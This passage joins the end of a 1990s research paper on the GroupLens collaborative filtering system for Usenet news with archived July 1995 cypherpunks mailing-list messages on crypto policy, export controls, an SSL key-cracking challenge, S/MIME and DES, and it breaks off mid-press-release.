   in the next pilot test to read and rate all the articles in a training
   set. The training set will contain a number of articles from each of
   the newsgroups that will be included in the test. Since users will
   contribute ratings under a pseudonym, we will be able to share the
   ratings in this training set with other researchers. In addition, we
   will retain the full texts of the articles in the training set. That
   will enable evaluation of BBBs that perform content filtering, or a
   combination of content filtering and collaborative filtering, as well
   as those that use only other users' ratings.
   
   SOCIAL IMPLICATIONS
   
   Collaborative filtering may introduce many social changes in the
   already rapidly evolving Netnews community. For example, the utility
   of moderated newsgroups may decline. New social patterns will have to
   develop to encourage socially beneficial behaviors, such as reviewing
   articles that have already received a few low ratings. Finally, if
   GroupLens is effective at creating peer groups with shared interests,
   will those peer groups be permeable or will the global village
   fracture into tribes?
   
   Changes to Netnews Behaviors
   
   GroupLens has the potential to change Netnews as we now know it. For
   one thing the quality of articles individual users choose to read
   should increase. More significantly, as more and more users rely on
   GroupLens the total number of low-quality articles on Usenet may
   decrease significantly. Since few people will read such articles, the
   incentive to post them will decrease. GroupLens may also supplant or
   supplement other established Netnews behaviors.
   
   Moderated Newsgroups 
   
   GroupLens may reduce the need for moderated newsgroups. The advantages
   of GroupLens over the existing approach are that "moderators" can be
   groups of people as well as individuals, and that each user can rely
   on a different moderator rather than having a single moderator for the
   entire group.
   
   Some newsgroups might choose to use both a moderator and GroupLens.
   The moderator of a newsgroup will make the initial pass through the
   article submissions. Peer ratings would then allow further filtering.
   
   Newsgroup Splits 
   
   Currently, newsgroups start off with broad topics and split into
   narrower topics as traffic increases. For example, the newsgroup
   rec.sport.football eventually split into the subgroups australian,
   canadian, rugby, pro, college, fantasy, misc, and one for each team in
   the NFL. These splits are a form of content filtering, initiated and
   managed by the users.
   
   GroupLens users may find that many such splits are less important, and
   in some cases undesirable. Over the course of time users will find
   themselves reading only the subset of the newsgroup they are most
   interested in, as they correlate with a peer group with similar
   interests. Splits of interest between groups of users will appear
   naturally, with no additional user or administrative effort. Allowing
   the splits to happen through GroupLens rather than through explicit
   content filtering allows more cross-pollination of general interest
   articles. For instance, interesting articles posted by Bills fans
   about an upcoming football game against the Cowboys would also reach
   Cowboys fans with GroupLens, but would not if the articles were posted
   in the more specialized newsgroup rec.sport.football.bills.
   
   Kill-Files 
   
   Kill files are a content filtering mechanism implemented in some news
   clients. Many users who strongly dislike particular subjects or
   particular authors, however, do not use kill files because they find
   the mechanism complicated and cumbersome. GroupLens might be an easier
   means to the same end. A user's peer group will give such articles low
   ratings, so only a few users will have to read them.
   
   Incentives
   
   Individuals put additional effort, albeit a modest amount, into
   providing ratings through GroupLens. These ratings provide benefit to
   other users who can use them to select interesting articles. It's a
   two-way street: everyone can be both a producer and a consumer of
   ratings.
   
   When someone reads and rates an article, there is an incentive to
   provide honest ratings, because dishonest ratings will cause the BBB
   to make poor future predictions for that user. On the other hand,
   there is no incentive to rate articles at all. On the contrary, there
   is an incentive to wait for others' ratings rather than read and rate
   an article oneself. A certain amount of altruism or guilt may cause
   most people to "do their share" of rating, but fewer than the socially
   optimal number of ratings are likely to be produced.
   
   The four-person Minnesota pilot test included a high-volume newsgroup,
   rec.arts.movies. The volume of articles was so high that each
   participant was unwilling to read a one-quarter share of the total
   daily volume. The newsgroup was quickly dropped from the test. It may
   be that a larger user population would generate ratings even for a
   high-volume list such as rec.arts.movies, but it is harder to draw on
   a "do-your-share" mentality when collaborating with larger groups of
   people.
   
   There are other, more subtle incentive problems that can arise as
   well. For example, there is an asymmetry between the effects of
   positive and negative ratings. If the first few readers rate an
   article too highly, others will read the article and give it lower
   ratings. On the other hand, if the first few ratings of an article are
   negative, others who would have rated it highly may never look at it
   because of the initial negative rating.
   
   To avoid this, it may be necessary to provide external incentives to
   some people to read and rate articles that have initially low ratings.
   The external incentives could be money, fame, or simply access to
   others' ratings: those who did not contribute their share of ratings
   might be denied access to the Better Bit Bureau's predictions.
   
   Global Villages
   
   Present newsgroups, like newspapers and local television shows before
   them, provide a shared history for their community of readers. With
   GroupLens, users may choose to read articles only from a small group
   with whom they share many common interests. Over time this could lead
   to a fracture of the global village into many small tribes, each
   forming a virtual community but nonetheless isolated from each other.
   
   Some kind of fracture is inevitable and even desirable, because no
   user can keep up with the overwhelming volume of news produced each
   day. The question is whether the subgroups will be closed or
   permeable. One argument for prognosticating permeability is that many
   groups will form for a short time and then disband [3]. Another is
   that many users will participate in several subgroups, providing a
   mechanism for the best ideas to cross boundaries of interest groups.
   
   CONCLUSION
   
   Shared evaluations are useful in all sorts of activities. We ask
   friends, colleagues, and professional reviewers for their opinions
   about books, movies, journal articles, cars, schools, and
   neighborhoods. Clearly, some form of shared evaluations should also
   help in filtering electronic information streams such as netnews. It
   is not yet clear exactly what form those evaluations should take, how
   they should be collected and disseminated, and how they should be used
   in selecting articles to read.
   
   GroupLens is one promising approach. A single number gives a composite
   rating of an article on all dimensions relevant to a particular
   reader. We have modified three news reading clients to enable easy
   entry of such numeric ratings. We have also modified the way that the
   clients display subject lines to include predicted scores based on
   others' ratings.
   
   Naturally, there will be differences of opinion among readers about
   particular articles, due to varying interests or quality assessments.
   To accommodate differences of opinion, not all readers will place
   equal trust in particular evaluators. The algorithms we have
   implemented automatically determine how much weight to place on each
   evaluation, based on the degree of correlation between past opinions
   of the reader and evaluator. This has the beneficial side effects that
   readers need not know initially whose evaluations to trust and the
   evaluators' opinions can become trusted even if the evaluators choose
   to remain anonymous.
   
   The GroupLens architecture allows new users to connect and new rating
   servers to come on line, without global coordination. A new user need
   only use a modified news client and have a connection to a rating
   server. The user need not convince the administrator of her netnews
   server to modify the news server, run any additional software, or even
   to carry any additional newsgroups. A new rating server needs only to
   get access to a news server that carries the ratings newsgroups.
   
   Moreover, the architecture is open. Anyone who wishes to can modify a
   news client to allow entry of evaluations or to use predicted scores,
   so long as the client follows the protocol we have established for
   communicating with the rating server. Anyone who wishes to improve on
   the score predictions that our rating servers make can do so. There
   may be better ways to correlate past evaluations. There may also be
   ways to use the evaluations in conjunction with content filtering. For
   example, when correlating past evaluations, the scoring algorithm
   might consider evaluations only of past articles that are somehow
   similar to the current one. Our next pilot test should yield a data
   set that can be used for evaluating alternative prediction methods.
   
   Only further testing can reveal whether GroupLens gathers the right
   kind of evaluations and uses them in ways that people like. If the
   simple numeric evaluations turn out to be sufficient, the architecture
   will scale up to large numbers of rating servers and users. If not,
   then data from our tests will help develop and evaluate other
   mechanisms for sharing and using evaluations.
   
   Right now, people read news articles and react to them, but those
   reactions are wasted. GroupLens is a first step toward mining this
   hidden resource.
   
   ACKNOWLEDGMENTS
   
   Shumpei Kumon's keynote address at CSCW 92 [11] inspired our
   investigation of the practical application of reputations to social
   filtering. Thanks to Lorin Hitt and Carl Feynman for helpful
   discussions about how to predict scores based on past correlations.
   Peter Foltz and Sue Dumais generously provided a test rating set
   generated from one of their experiments on content filtering [5].
   Thanks also to Chris Avery, Joe Adler, Yannis Bakos, Erik
   Brynjolfsson, David Goldberg, Bill MacGregor, Tom Malone, David Maltz,
   Vahid Mashayekhi, Lisa Spears, Doug Terry, Mark Uhrmacher, and
   Zbigniew Wieckowski.
   
   REFERENCES
   
   1. Allen, R.B. User Models: Theory, Method, and Practice.
   International Journal of Man-Machine Studies, 32, (1990), pp.
   511-543.
   
   
   
   2. Belkin, N.J. and Croft, B.W. Information Filtering and Information
   Retrieval: Two Sides of the Same Coin? CACM, 35, 12 (1992), pp. 29-38.
   
   
   
   3. Brothers, L., Hollan, J., Nielsen, J., Stornetta, S., Abney, S.,
   Furnas, G. and Littman, M. Supporting Informal Communication via
   Ephemeral Interest Groups. In Proceedings of CSCW 92 (1992, New York:
   ACM), pp. 84-90.
   
   
   
   4. Deerwester, S., Dumais, S.T., Furnas, G.W., Landauer, T.K. and
   Harshman, R. Indexing by Latent Semantic Analysis. Journal of the
   American Society for Information Science, 41, 6 (1990), pp. 391-407.
   
   
   
   5. Foltz, P.W. and Dumais, S.T. Personalized Information Delivery: An
   Analysis of Information Filtering Methods. Communications of the ACM,
   35, 12 (1992), pp. 51-60.
   
   
   
   6. Goldberg, D., Nichols, D., Oki, B.M. and Terry, D. Using
   Collaborative Filtering to Weave an Information Tapestry.
   Communications of the ACM, 35, 12 (1992), pp. 61-70.
   
   
   
   7. Hill, W.C., Hollan, J.D., Wroblewski, D. and McCandless, T. Edit
   Wear and Read Wear. In Proceedings of CHI 92 Conference on Human
   Factors in Computing Systems (1992, New York: ACM), pp. 3-9.
   
   
   
   8. Kahn, R.E. and Cerf, V.G. The Digital Library Project, Volume 1:
   The Wold of Knowbots. An Open Architecture for a Digital Library
   System and a Plan for Its Development . CNRI, 1895 Preston White
   Drive, Suite 100, Reston, VA 22091 Tech Report (March, 1988).
   
   
   
   9. Karlgren, J. Newsgroup Clustering Based on User Behavior-- A
   Recommendation Algebra . Swedish Institute of Computer Science
   #SICS-T--94/04-SE (March, 1994).
   
   
   
   10. Kawell, L.J., Beckhardt, S., Halvorsen, T. and Ozzie, R.
   Replicated Document Management in a Group Communication System. In
   Proceedings of CSCW 88 (1988, New York: ACM).
   
   
   
   11. Kumon, S. From Wealth to Wisdom: A Change in the Social Paradigm.
   In Proceedings of CSCW 92 (1992, New York: ACM), pp. 3.
   
   
   
   12. Maes, P. and Kozierok, R. Learning Interface Agents. In
   Proceedings of AAAI 93 (1993, San Mateo, CA: American Association
   for Artifical Intelligence).
   
   
   
   13. Malone, T.W., Grant, K.R., Turbak, F.A., Brobst, S.A. and Cohen,
   M.D. Intelligent Information Sharing Systems. Communications of the
   ACM, 30, 5 (1987), pp. 390-402.
   
   
   
   14. Maltz, D.A. Distributing Information for Collaborative Filtering
   on Usenet Net News . MIT Department of EECS MS Thesis (May, 1994).
   
   
   
   15. Pindyck, R.S. and Rubinfeld, D.L. Econometric Models and Economic
   Forecasts. MacGraw-Hill, New York, 1991.
   
   
   
   16. Salton, G. and Buckley, C. Term-Weighting Approaches in Automatic
   Text Retrieval. Information Processing and Management, 24, 5 (1988),
   pp. 513-523.
   
   
   
   17. Salton, G. and Buckley, C. Improving Retrieval Performance by
   Relevance Feedback. Journal of the American Society for Information
   Science, 41, 4 (1990), pp. 288-297.
   
   
   
   18. Sheth, B. A Learning Approach to Personalized Information
   Filtering . MIT Department of EECS MS Thesis (February, 1994).
   
   
   
   19. Stodolsky, D.S. Invitational Journals Based Upon Peer Consensus .
   Roskilde University Centre, Institute of Geography, Socioeconomic
   Analysis, and Computer Science. ISSN 0109-9779-29 #No. 29/ 1990 (,
   1990).
   
   20. Suchak, M.A. GoodNews: A Collaborative Filter for Network News .
   MIT Department of EECS MS Thesis (February, 1994).
   
   21. Wiederhold, G. Mediators in the Architecture of Future Information
   Systems. IEEE Computer, March, (1992), pp. 38-49.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 26 Jul 95 15:19:04 PDT
To: gnu@toad.com (John Gilmore)
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
In-Reply-To: <9507261951.AA23210@toad.com>
Message-ID: <199507262218.SAA00901@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| I collated all the questions into a large ungainly message and sent it
| to Herb Lin.  He has been after me to go back over it and make a more
| useful set of questions, which I haven't done yet.  He says they are
| meeting with the FBI in September and want to get questions to them in
| August (incorporating our ideas).  I've promised him I will get him the
| formatted list of questions by the end of next week.

	A question that might be interesting to add would be "Given
the intense difficulties in replacing the DES, why does Clipper have
an 80 bit key?  Wouldn't it make more sense to design a standard that
will at least resist brute force attacks for longer?"

	I understand there are difficulties in projecting computing
power that far ahead, as well as guessing at the actual improvement in
mathematical and cryptographic theory, but why not have a standard
with a 128 bit key?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 26 Jul 95 17:01:12 PDT
To: perry@imsi.com
Subject: Challenge-response passwords (Was: big word listing)
In-Reply-To: <9507261952.AA28574@snark.imsi.com>
Message-ID: <199507262348.AA23992@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Reply-To: perry@imsi.com
   X-Reposting-Policy: redistribute only with permission
   Date: Wed, 26 Jul 1995 15:52:36 -0400
   From: "Perry E. Metzger" <perry@imsi.com>

   Given all the prior art, I have a solid suspicion that the patent
   wouldn't hold up. The existance of the publically published Diffie
   Hellman patent, for instance, makes it rather hard to patent the
   more general case.

   Perry

Does anyone know if that patent on distributed file systems that was
filed in '82 and granted sometime recently held up in court?

The last I heard the guy was going around collecting royalty payments
from large companies unwilling to go to court anyway.

Is this the sort of thing it's easier for a small company to challenge
than a big company?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 26 Jul 95 17:01:48 PDT
To: cypherpunks@toad.com
Subject: WIL_mil
Message-ID: <199507262341.TAA26317@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Garry Wills, the historian, writes a thought-provoking essay 
in
   The New York Review of Books, August 10, 1995, on "The New
   Revolutionaries," about the militants and the political and
   social grievances that undergird their movement -- many of
   which are shared, Will states, by a wide spectrum of the
   populace discontented with the government:

      The suspicion that government has become the enemy of
      freedom, not its protector, crosses ideological lines.
      Liberals point to FBI plots against American citizens
      like Dr. King, to CIA experiments with LSD on American
      citizens, to the Defense Department's use of Americans
      as guinea pigs in nuclear testing. The right sees
      assaults on liberty from the Bureau of Alcohol, Tobacco
      and Firearms, the Department of the Interior, the
      Occupational Safety and Health Administration. Many
      people resent the fact that government has become a
      dictator of the terms of societal conduct -- in welfare
      programs, in affirmative action and other preferential
      attitudes toward citizens' rights, in schools that seem
      to have a "multicultural" or antireligious agenda, in
      confiscatory taxation, in the keeping of elaborate files
      on citizens' activities, in various agencies'
      surveillance techniques and bribing of informers.

   Wills goes on to review these grievances:

      Taxation.
      The jury system.
      Regulations.
      Police power.
      Schools.
      Family.
      Religion.
      Citizen militias.
      Constitutionalism.
      Corruption.
      Guns -- discussed at length.

   And, he summarizes in closing:

      With the end of the cold war, the justification for
      government activism has been taken away. If the
      government is only good for fighting Communists, and it
      no longer fights Communists, then what good is it? No
      convincing answer comes from above -- which lends the
      answer from the depths its new plausibility: It is good
      for nothing, and citizens must take their own lives in
      hand again, vindicating their own liberties. Right or
      wrong, the armed patriots at least have arguments they
      can believe in wholeheartedly. They take the mood of
      post-cold war drift, of Perotista resentment, of
      disillusionment and economic shakiness, of fin de siecle
      fear, and change it into a plan for doing something
      about one's gripes.

      The militias and their supporters are
      not the most central social symptom of our time, but
      they are among the more dramatic symptoms of a general
      crisis of legitimacy. The authority of government can no
      longer be assumed. It has to be justified from the
      ground up.

      Many people who are not militants or conspiratorialists
      can agree with parts of this analysis. Libertarians
      wonder why people who keep to themselves should be
      bothered.

      It is no longer so "extreme" to believe that our
      government is the greatest enemy to freedom. We see this
      in a new hatred of government agents (who fear for their
      lives in western states). Or in the unprecedented
      vilification of the head of our government. The fierce
      contempt for Hillary Rodham Clinton, for the Attorney
      General (called "Butch" Reno on bumper stickers), for
      "Condom Queen" Joycelyn Elders, reflects misogyny
      rebelling against feminism's gains; but it is also a
      sign that the office of the presidency itself may now
      incur a contempt as routine as the respect it once
      commanded. The heaping of filth on the personnel and
      symbols of government has a delegitimating effect in
      itself; and the assault is joined to the disillusion,
      anger, and disorientation that have marked recent
      electoral behavior. Where the heated deny legitimacy and
      the cool are doubtful of it, a crisis is in the making.


   WIL_mil (about 50K, in 3 parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Wed, 26 Jul 95 17:36:46 PDT
To: cypherpunks@toad.com
Subject: connectsoft & encryption
Message-ID: <01HTC7Y9RXO28WW6NV@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Tuesday, 25-Jul-95 07:26 AM

ConnectSoft Licensing Agreement with RSA Data Security Includes
Revolutionary S/ MIME Technology; ConnectSoft's early 


BELLEVUE, WASH. (July 24) BUSINESS WIRE -July 24, 1995--ConnectSoft,
Inc.,  provider of the most powerful, easy-to-use interfaces to
digital  communication and commerce, announced today it has licensed
a new  interoperable security technology from RSA that will provide
ConnectSoft  customers with added privacy and security to their daily
communications.  The agreement gives ConnectSoft products compliancy
with the S/MIME  specification (Secure Multipurpose Internet Mail
Extension) that ensures a customer's e-mail is read only by the
designated recipient -- regardless of the e-mail platform they are
using.  The new security features will be included in the newest
versions of ConnectSoft's E-Mail Connection(tm) and Internet
Connection(tm) products that will be released this fall.  

"In today's networked world, security is a growing concern as we rely
on  e-mail for more of our day-to-day communications,"  said Bob
Dickinson,  ConnectSoft's vice president and general manager,
Consumer Online Products & Services division.  "Our arrangement with
RSA provides encryption and authentication technologies giving our
customers the most protected and secure communication available
today."  

The S/MIME specification is based on the popular Internet MIME
standard and allows a customer's S/MIME message to be composed and
encrypted on one vendor's system and be successfully received and
decrypted on a different one. The specification also uses the
intervendor PKCS (Public Key Cryptography Standards), the most widely
implemented commercial standard for public-key cryptography in North
America.  

Global Security Standard  

- ------------------------  

Encryption and authentication have been viewed as crucial enabling  
technologies for electronic commerce on the World Wide Web -- but
encryption has been slow to come to e-mail, with most packages
offering nothing at all.  "ConnectSoft's early support of S/MIME
demonstrates its commitment to provide customers with secure digital
communication as well as its sophistication in developing future
electronic commerce solutions,"  said Jim Bidzos, RSA president.  

According to RSA, a global security standard is essential for the
development of a global digital economy.  "If one public-key system
is used everywhere for authentication, then signed digital documents
can be exchanged between users in different countries using different
software on different platforms,"  Bidzos said.  "This
interoperability is necessary for a true digital economy to
develop."  

RSA Data Security is the world's "brand name"  for cryptography, with
more than 12 million copies of its software encryption and
authentication installed and in use worldwide.  RSA is part of
existing and proposed standards for the 

Internet, CCITT, ISO, ANSI, IEEE and business and financial networks
around the globe.  The company develops and markets
platform-independent developers kits, end user products, and provides
comprehensive cryptographic consulting services.  Founded in 1982 by
the inventors of the patented RSA Public Key Cryptosystem, the
company is headquartered in Redwood City, California.  

ConnectSoft is a privately held company based in Bellevue, Wash. It
was  founded in January 1988 and operates three divisions -- Consumer
Online  Products and Services, Commercial Software Development
Services and Commercial Network Services -- targeted at providing
customers with innovative products, custom software and network
services for conducting digital commerce.  The Consumer Online
Products division markets the company's award winning products, such
as E-Mail Connection, Internet Connection and KidMail Connection.  
The
Commercial Software Development Services division develops custom
software which enables secure, digital communications, commercial
transactions, and Integrated Logistics Systems for Fortune 1000
companies such as United Parcel Service (UPS).  The recently formed
Commercial Network Services division will provide high bandwidth,
high-quality commercial Internet and TCP/IP services to large- and
medium-sized companies throughout the United States. -0- E-Mail 
Connection and Internet Connection are registered trademarks of
ConnectSoft, Inc.  Other company, brand product and service names may
be trademarks or registered marks of their respective holders.  

- --30--KS/se*  

CONTACT:  Kaufer Miller Communications  
   David Kaufer, Tamese Robinson or Michele Ruegg  
          206/450-9965  
          MCI Mail:  576-6983  
                    OR  
   ConnectSoft, Inc.  
   Linda Coyle, 206/827-6467 Ext. 5409  
                Internet: lindacconnectsoft.com  

KEYWORD:  WASHINGTON  

INDUSTRY KEYWORD:  COMPUTERS/ELECTRONICS COMED PRODUCT
INTERACTIVE/MULTIMEDIA  REPEATS: New York 212-575-8822 or
800-221-2462; Boston 617-330-5311 or         800-225-2030; SF
415-986-4422 or 800-227-0845; LA 310-820-9473 BW URL: 
http://www.hnt.com/bizwire 

                   * * * END OF STORY * * * 


-----BEGIN PGP SIGNATURE-----
Version: 2.61

iQEVAwUBMBYw0SgP1O9KJoPBAQEnbgf/Xh1RmNq+TRp0x/owRZuJOi/ThSanerkA
O59761UffY+syiO9RNeM02imGIn32cvEO2c1ud/nwgIxiPdSeQK4LN41r2fu9xmu
OCKgA9jjtMysiFyMYLaeyRXGfvlIoPatTZDQ4e153Gjq0iex2Ely5Ft+KYFgjA0g
ysFKf5U7qMfV2nmVExxe7FM/Ou3MsT98E7V44A9auzEEPIqN1bnG/t8hzBgCdb01
U9ywG3HVKDUANSeWpFTLFMqi4inr67/XozXSYBcmyO7xS+pVw92svlrywIs9TVXw
8ejnOQs9pQyKp6M2XJzdIj5nZE7a8EXyBL9A3PBNPFBpztpUa+c5mA==
=kOS6
-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 26 Jul 95 14:53:21 PDT
To: trei@process.com
Subject: Re: SSL challenge?
In-Reply-To: <9507262108.AA25550@toad.com>
Message-ID: <"swan.cl.cam.:090810:950726215000"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Where does the effort to bruteforce SSL stand?

Andy has the spec wrapped up, and is finalising his Windows 32 Client.
I have the key doler running, a perl client and a shell driving script,
	along with a new WWW interface (which we hope won't be used much)
Adam has bruterc4 tweaked to interact with my perl client.
Andrew has a copy of bruterc4 and is making brutessl similar.

We're all ready to go, but I'm off for three weeks, and as Adam will be taking
over my stuff in my absence, it might take him a while to understand it and
make the few last minute tweaks ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Wed, 26 Jul 95 21:20:37 PDT
To: cypherpunks@toad.com
Subject: Strategic Invest. on Bad Boys, Blk Net, & Remailers
Message-ID: <199507270622.BAA12647@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


from:        Strategic Investment
             824 East Baltimore Street
             Baltimore, MD 21202

                      July 25, 1995
------------------------------------------------------------
----------
                     BEHIND THE LINES   BY  Jack Wheeler

                         BAD GUYS

   Let's suppose, "just suppose," that the president has
placed you in
charge of a super-secret spy agency conducting electronic
intelligence,
the National Security Agency; and suppose that he ordered
you to trace
the activities of those who have replaced the Communists as
official
"Bad Guys," "Enemies of the State:" tax evaders, money
launderers, and
drug traffickers. So you decide to pull one of the great
intelligence
coups of modern times, by having the NSA become a major
provider of
banking software.

   Working through a cutout company skilled in managing
money in support
of U.S. covert operations, and using a modified version of
sophisticated
tracking software provided by the Justice Department's
intelligence
service (OSI, Office of Special Investigations), you sell
your product
to financial institutions around the globe - not telling
them, of course,
that what they're buying has an electronic "backdoor" giving
the NSA
computerized access to the intimate details of their
customers' financial
transactions. In less than a decade, your client list
includes many of
the world's leading banks.

   The banks behind the Visa smart card for the Atlanta
Olympics, and
those soon to offer Internet banking are your clients too.
Yes, now
you'll do your patriotic duty and get the Bad Guys - and
anyone else you
decide is an Enemy of the State.

   We're just suppposing, you understand.

                     THE BLACK NET

   A worldwide communications system, accessible to anyone
on the Inter-
net, of completely anonymous and unbreakable encrypted
messages and
transactions: That's the vision of the Black Net being
created by
"crypto-anarchist" computer programmers. Using programs like
"MixMaster"
and anonymous re-mailer computer servers that nest encryted
messages in
encrypted envelopes, the Black Net will defeat the NSA's
ability to trace
communications to their source via traffic analysis or any
other method.
Black Net banks could offer totally untraceable and
anonymous transact-
tions with the identity of the account holder unknown even
to the bank-
- rendering any attempts, such as those imagined above, to
get the Bad
Guys useless. As economist Richard Rahn puts it: "The
information tech-
nology of the 80s (cheap faxes & photocopiers, satellite
radio, etc.)
doomed an government's attempt to have a monopoly on the
supply of money."
------------------------------------------------------------
-----------

Beat State!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 26 Jul 95 20:30:28 PDT
To: KDAGUIO@aba.com
Subject: Re: Banks and Crypto
Message-ID: <v02130500ac3c4aceee4e@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 13:25 7/26/95, KDAGUIO@aba.com wrote:
>See attached file: F:\OFFILES\KODMAIL.MSG
>
>
>
>Attachment converted: Macintosh HD:KODMAIL.MSG (????/----) (0002C85B)


Is there ANY reason why you did not just paste the text of this file into
your message? Also, if you are going to attach files in lieu of writing
messages, it might be useful to mention what Wordprocessor was used to
create the file so it can be read. In this case, what format is your file
in?

Thank you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Wed, 26 Jul 95 20:31:23 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
Message-ID: <v02130500ac3c612078f3@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 7/26/95, Scott Brickner wrote:
>In message <2751@umlaw.demon.co.uk> Michael Froomkin writes:
>>> Therefore, the only organization which can hold a
>>> senator/representative liable for passing a bad law is the one which
>>> passed the law. :(
>
>>and the voters
>
>Not in the sense of being able to punish him.  The voters may only
>withold their support in the next election.  Not nearly enough to
>deter morons like Exon.

Who, unless I'm confusing him with someone-else, is not going to stand for
reelection and thus can run amuck with no possible fall-out from the
voters.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@alias.com>
Date: Wed, 26 Jul 95 20:41:11 PDT
To: cypherpunks@toad.com
Subject: Canadian Export Controls
Message-ID: <9507262340.ZM6734@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



This is a notification of the first creation of a few pages describing
Canadian Export Controls. Any one who has read the printed document
[Canada's Export Controls] will realise that it's almot word-for-word,
but there's some use for that.

In any case, they currently live at
	http://www.io.org/~samwise/crypto/
It may be that they'll move, but
	http://www.io.org/~samwise/interesting.html#privacy
should always have a pointer to them.

comments, bugs, spelling errors, contributions to rmartin@alias.com

The pages were written this evening. Tomorrow morning I'll look at them,
scream, wonder what I was thinking, and rewrite them. This is so that
there'll be a few more screams. :)

frodo =)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Thu, 27 Jul 95 06:12:32 PDT
To: gnu@toad.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
Message-ID: <2802@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


ask them if their policy allows them to purport to run an 
anonymous remailer, e.g. as part of a sting operation.


In message <9507261951.AA23210@toad.com> John Gilmore writes:
> I collated all the questions into a large ungainly message and sent it
> to Herb Lin.  He has been after me to go back over it and make a more
> useful set of questions, which I haven't done yet.  He says they are
> meeting with the FBI in September and want to get questions to them in
> August (incorporating our ideas).  I've promised him I will get him the
> formatted list of questions by the end of next week.
> 
> 	John
> 

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Plumb" <mp@io.org>
Date: Wed, 26 Jul 95 20:52:36 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <9507251659.AA16288@ozymandias.austin.ibm.com>
Message-ID: <199507270352.XAA01331@twitch.io.org>
MIME-Version: 1.0
Content-Type: text


> So?  The ITAR doesn't control export to Canada.  Export the source code
> to Canada, compile, validate, sign, and put on CD in Canada, and export
> to the world.

No. Export of crypto to Canada is legal because Canada prohibits the
further export of goods of U.S. origin. Before the Canadian government
will allow further export of crypto software from the U.S., there must
be lot of improvement done to the product within Canada. The exact
rules are not well defined, but with crypto I expect that the CSE
(Communications Security Establishment -- our version of the NSA)
would push for at least 50% Canadian content. So I don't expect to
see PGP being exported legally any time soon.
 
> I also seem to remember a while back (Mar/Apr) someone reported here that the
> Canadian bureaucrat responsible for executing import/export rules said
> that he didn't consider crypto to be restricted by Canada's rules.

I have talked with the bureaucrat that I think you are referring
to, and he said no such thing. He said that public domain crypto
software that is entirely of Canadian origin was, in his opinion
not covered. When I talked to him, he stressed that PGP is still
covered.
--
	-marc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net (John A. Limpert)
Date: Wed, 26 Jul 95 22:32:04 PDT
To: cypherpunks@toad.com
Subject: Decoded Version of KODMAIL.MSG
Message-ID: <199507270530.BAA08378@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


The American Bankers Association is attempting to address the privacy and
security needs of banks and bank customers by ensuring that each have access
to appropriate cryptographic tools.

The ABA Cryptographic Policy will be posted on this list later today.

         ************************************************




CONTACT:  Sonia Barbara			         FOR IMMEDIATE RELEASE
	         (202) 663-5469
(1995)

ABA REAFFIRMS SUPPORT FOR PRIVATE-SECTOR CONTROL 
OF CRYPTOGRAPHY

Association Recommends a 10-year Extension for the Data Encryption Standard

	WASHINGTON, July 21 -- The Data Encryption Standard (DES) should be
recertified for at least 10 more years to allow interested financial
institutions adequate time to convert to any new cryptography standard, the
American Bankers Association said in a policy statement issued today.
	Encryption is the process whereby sensitive data communications, such as
wire transfers, credit card and automated teller machine transactions, are
protected by secret codes to protect their confidentiality.   DES, released
in 1977, is the primary method used by financial institutions to encrypt
information.
	Critics say that the longer DES is used, the more likely its code could be
broken.
While realizing this could limit its life span as a government certified
standard, ABA warned that requiring banks to convert to a new standard by
